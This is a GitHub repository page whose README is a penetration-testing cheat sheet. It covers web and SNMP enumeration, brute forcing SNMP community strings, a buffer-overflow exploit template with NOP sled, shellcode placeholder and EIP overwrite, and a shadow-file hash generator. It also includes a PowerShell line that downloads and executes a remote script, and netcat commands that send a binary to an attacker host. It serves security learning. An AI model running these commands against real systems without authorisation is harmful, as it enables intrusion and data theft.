Skip to content

learnsecurely/pentest-cheat-sheet

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

16 Commits
README.md
README.md
 
 

Repository files navigation

pentest-cheat-sheet

Windows

Download and execute powershell enumeration script

PS C:\> IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/absolomb/WindowsEnum/master/WindowsEnum.ps1')

Web

gobuster

# Find interesting URLs
gobuster -e \
         -w /usr/share/wordlists/dirb/common.txt \
         -t 20 \
         -u <target_url>

nikto

# Scan for web vulnz
$ nikto -h <url>

SNMP

<version> = 1 OR 2c

Install/enable MIBs

# Install a bunch of MIBs
$ sudo apt-get install snmp-mibs-downloader

Edit snmp.conf to enable/disable MIB translation
$ sudo vim /etc/snmp/snmp.conf

onesixtyone

$ onesixtyone -c /usr/share/doc/onesixtyone/dict.txt <ip>

snmpcheck

TODO

snmpwalk

$ snmpwalk -v<version> -c <community> <ip>

enyx

$ python enyx.py <version> <community> <ip>

nmap

# Scan SNMP using default nmap scripts
$ nmap -sU \
       -sC \
       -p 161 \
       -n \
       -oA nmap-udp-snmp-default \
       <ip>

# Brute force the SNMP community string using nmap
$ nmap -sU \
       -sC \
       -p 161 \
       -n \
       --script snmp-brute \
       --script-args snmp-brute.communitiesdb=/usr/share/doc/onesixtyone/dict.txt \
       -oA nmap-udp-snmp-brute \
       <ip>

Download a binary using netcat and base64

# Prepare netcat to capture and redirect the base64 content to a file
eve$ nc -lvnp 1234 > <binary>.b64

# Base64 encode binary and send to eve via netcat
alice$ base64 <binary> | nc <eve_ip> 1234 

# Decode the binary
eve$ base64 --decode <binary>.b64 > <binary>

Buffer Overflow Example

????

# ???? Checksec a binary
eve$ checksec -f <binary>

Determine pattern offset / buffer size

# Create a 500-character alphanumeric sequence
$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500

# Debug the binary using gdb
$ gdb <binary>

# Run the exploit
(gdb) r $( exploit.py )

! The above should throw a seg fault, followed by a hex address. Use
! this as <hex_address> in the pattern_offset.rb command below.

# Use pattern_offset to determine the offset where seg fault happens
$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <hex_address>

! Output of pattern_offset above reveals buffer size (BUF_SIZE) below

Create exploit script

# Use bash HEREDOC to create explot.py. ALternatively you can copy the
# contents and paste into an editor.
$ cat << EOF > exploit.py
#!/usr/bin/env python

# Example (potential) usage:
#   # Run exploit.py in subshell and pass output to vulnerable binary
#   bob$ <binary> $( exploit.py )

# The buffer size is from the output of the pattern_offset command above
BUF_SIZE=<buffer_size>

# Grab shellcode from some place like packet storm and place it here
SHELL_CODE = "<shell_code>"

# Subtract the length of the shell code from the buffer/offset size, 
# generate that many "A" characters (\x90 in hex), and capture them as
# a string in the NOP_SLED var
NOP_SLED = "\x90"*(BUF_SIZE-len(SHELL_CODE))

# EIP is determined using the the section titled "Determine probable EIP
# value" and looks like "0xdeadbeef". This needs to be converted to machine
# code format which looks like "\xef\xbe\xad\xde"
#
# For example, to convert the hex 0xdeadbeef to machine code format, start
# by taking the last 2 characters (ef) and prefixing it with "\x" to make
# "\xef". Repeat the process with the previous 2 characters (be) and add
# the result which makes "\xef\xbe". Repeat 2 more times and 0xdeadbeef
# becomes "\xef\xbe\xad\xde".
#
# Repeate the process above using the <eip_hex_address> found by following
# the section titled "Determine probable EIP value" and place the result
# in the EIP var:
EIP = "<eip_address>"

# Finally, print the payload to the screen
print NOP_SLED + SHELL_CODE + EIP
EOF

Determine probable EIP value

# Run the exploit script
(gdb) r $( exploit.py )

# Print $esp in 100-byte chunks
(gdb) x/100x $esp

# Print 500 bytes before $esp in 100-byte chunks
(gdb) x/100x $esp-500

# Hit <enter> if/until you see multiple lines in a row that look like:
# 0xbffff410: 0x90909090	0x90909090	0x90909090	0x90909090

!! TBD

Linux

How to create a sha512 hash for placing directly into a unix shadow file

## How to generate a sha512 hash suitable for /etc/shadow using Mac OSX
$ pip install passlib
$ python -c "from passlib.hash import sha512_crypt; import getpass,string,random; print sha512_crypt.using(salt=''.join([random.choice(string.ascii_letters + string.digits) for _ in range(16)]),rounds=5000).hash(getpass.getpass())"

Binary Analysis

Use strace to see system calls

$ strace <binary>

Use Radare 2 (r2) to visualize assembly code

$ r2 <binary>

# Start by analyzing all functions
[0x12345678]> aaa

# List all functions
[0x12345678]> afl

# Visualize the functions and flow
[0x12345678]> vvv

# Press down to scroll to entrypoint, like main or sym.main

# Press "g" twice to go into entrypoint and prepare ASCII visualization

About

No description, website, or topics provided.

Resources

Readme
Activity
Custom properties

Stars

0 stars

Watchers

3 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published